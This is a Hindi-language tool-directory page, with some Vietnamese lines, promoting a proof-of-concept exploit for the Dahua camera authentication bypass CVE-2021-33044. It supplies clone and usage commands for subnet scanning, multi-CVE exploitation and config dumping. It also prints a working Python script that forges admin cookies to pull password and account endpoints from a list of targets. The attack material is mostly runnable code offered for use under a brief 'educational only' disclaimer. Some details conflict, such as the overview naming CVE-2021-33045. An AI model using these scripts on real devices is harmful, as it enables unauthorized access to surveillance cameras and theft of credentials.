Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — डाहुआ प्रमाणीकरण बाईपास (CVE-2021-33044) के लिए PoC शोषण। सबनेट स्कैन करता है, एकाधिक CVEs का परीक्षण करता है, और मान्य क्रेडेंशियल्स के बिना तैयार कुकीज़ के माध्यम से डिवाइस कॉन्फ़िगरेशन डंप करता है। | Kitploit
उपकरण/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
प्रमाणीकरण और प्राधिकरणIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DAHUA_AUTH-BYPASS-CVE-2021-33044

डाहुआ प्रमाणीकरण बाईपास (CVE-2021-33044) के लिए PoC शोषण। सबनेट स्कैन करता है, एकाधिक CVEs का परीक्षण करता है, और मान्य क्रेडेंशियल्स के बिना तैयार कुकीज़ के माध्यम से डिवाइस कॉन्फ़िगरेशन डंप करता है।

रिपॉजिटरी देखें
175 महीने पहलेअभी तक समीक्षित नहीं

Dahua Authentication Bypass PoC (CVE-2021-33044) का शोषण अनुकरण

अवलोकन

Dahua IP कैमरे सुरक्षा निगरानी प्रणालियों में व्यापक रूप से उपयोग किए जाने वाले IoT उपकरण हैं। चूंकि इन्हें अक्सर आंतरिक नेटवर्क में तैनात किया जाता है या इंटरनेट से एक्सेस किया जाता है, IP कैमरों में सुरक्षा कमजोरियां गोपनीयता और सूचना सुरक्षा को गंभीर रूप से प्रभावित कर सकती हैं।

CVE-2021-33045 कुछ Dahua कैमरा मॉडलों में मौजूद एक सुरक्षा कमजोरी है, जो वैध प्रमाणीकरण के बिना आंतरिक कॉन्फ़िगरेशन संसाधनों तक अनधिकृत पहुंच की अनुमति देती है। यह कमजोरी डिवाइस के फर्मवेयर में ढीले अभिगम नियंत्रण तंत्र से उत्पन्न होती है।

कमजोरी की जानकारी

मदविवरण
CVECVE-2021-33044
प्रकारAuthentication Bypass
गंभीरताCritical (CVSS ~9.8)
प्रमाणीकरणआवश्यक नहीं
प्रभावित क्षेत्रDahua Camera / DVR / NVR

कारण

यह कमजोरी Dahua कैमरा फर्मवेयर में असुरक्षित प्रमाणीकरण डिज़ाइन से उत्पन्न होती है:

  • सर्वर सत्र/टोकन की ठीक से जाँच नहीं करता
  • क्लाइंट से भेजे गए डेटा पर भरोसा करता है
  • कुछ संवेदनशील कॉन्फ़िगरेशन एंडपॉइंट केवल कुकी के अस्तित्व की जाँच करते हैं, वास्तविक पहुँच अधिकारों की नहीं

यह हमलावर को अनुमति देता है:

  • प्रमाणीकरण प्रक्रिया को जाली बनाना
  • लॉगिन को पूरी तरह से बायपास करना

संदर्भ:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

प्रमाणीकरण बायपास तंत्र का कार्य सिद्धांत

सामान्य प्रवाह

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

स्क्रिप्ट

उपयोग

स्थापना

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

नेटवर्क स्कैन

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

सामान्य Dahua पोर्ट: 80,443, 8080, 37777, 37778

CVE कमजोरी का शोषण

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

प्रमाणीकरण बायपास

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

उदाहरण

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

व्याख्या

  • स्क्रिप्ट requests लाइब्रेरी का उपयोग करती है और SSL चेतावनियों को निष्क्रिय करने के लिए सक्रिय रूप से SSL चेतावनियाँ बंद करती है।

  • dump_accounts(ip, port=80) फ़ंक्शन मुख्य फ़ंक्शन है जो एक कैमरा डिवाइस की जाँच के लिए जिम्मेदार है। फ़ंक्शन के मुख्य कार्य हैं:

    • IP पते और पोर्ट से URL बनाना
    • कुकी के माध्यम से व्यवस्थापक लॉगिन स्थिति का अनुकरण करना
    • संवेदनशील कॉन्फ़िगरेशन एंडपॉइंट पर अनुरोध भेजना
    • यह निर्धारित करने के लिए प्रतिक्रिया का विश्लेषण करना कि डिवाइस प्रभावित है या नहीं
  • प्रमाणीकरण कुकी का अनुकरण। फ़ंक्शन निम्नलिखित कुकी मानों का उपयोग करता है:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • प्रभावित कैमरा संस्करणों में, बैकएंड वास्तविक sessionID को सत्यापित नहीं करता है, जिसके परिणामस्वरूप सिस्टम मानता है कि अनुरोध एक वैध व्यवस्थापक खाते से भेजा गया था।

लक्ष्य सूची प्रसंस्करण लूप

स्क्रिप्ट इनपुट फ़ाइल से लक्ष्य सूची पढ़ती है, प्रत्येक डिवाइस के लिए क्रमिक रूप से जाँच फ़ंक्शन को कॉल करती है। यह दृष्टिकोण कई कैमरों का स्वचालित रूप से मूल्यांकन करने की अनुमति देता है।

image

विकास प्रक्रिया

ये स्क्रिप्ट निम्नलिखित के आधार पर विकसित की गई हैं:

  • NVD से प्रकाशित CVE विवरण
  • Dahua के सुरक्षा बुलेटिन
  • सार्वजनिक PoC संदर्भ (seclists.org, packetstormsecurity)

परीक्षण स्थिति:

  • प्रमाणीकरण बायपास तर्क CVE विनिर्देशों के अनुसार कार्यान्वित किया गया है
  • कमजोर उपकरणों पर सीमित परीक्षण।

नोट

यह परियोजना:

  • केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है
  • कृपया इसे व्यक्तिगत प्रयोगशाला वातावरण में चलाएँ
टूल डाउनलोड करें
फ़ाइलउद्देश्यCVEs
dahua_scanner.pyनेटवर्क खोज — सबनेट पर Dahua कैमरे ढूँढनापता लगाना
dahua_exploit.pyMulti-CVE स्कैनर — सभी सुरक्षा कमजोरियों की जाँच करता है।सभी
dahua_auth_bypass.pyसमर्पित प्रमाणीकरण बायपास --dump विकल्प के साथCVE-2021-33044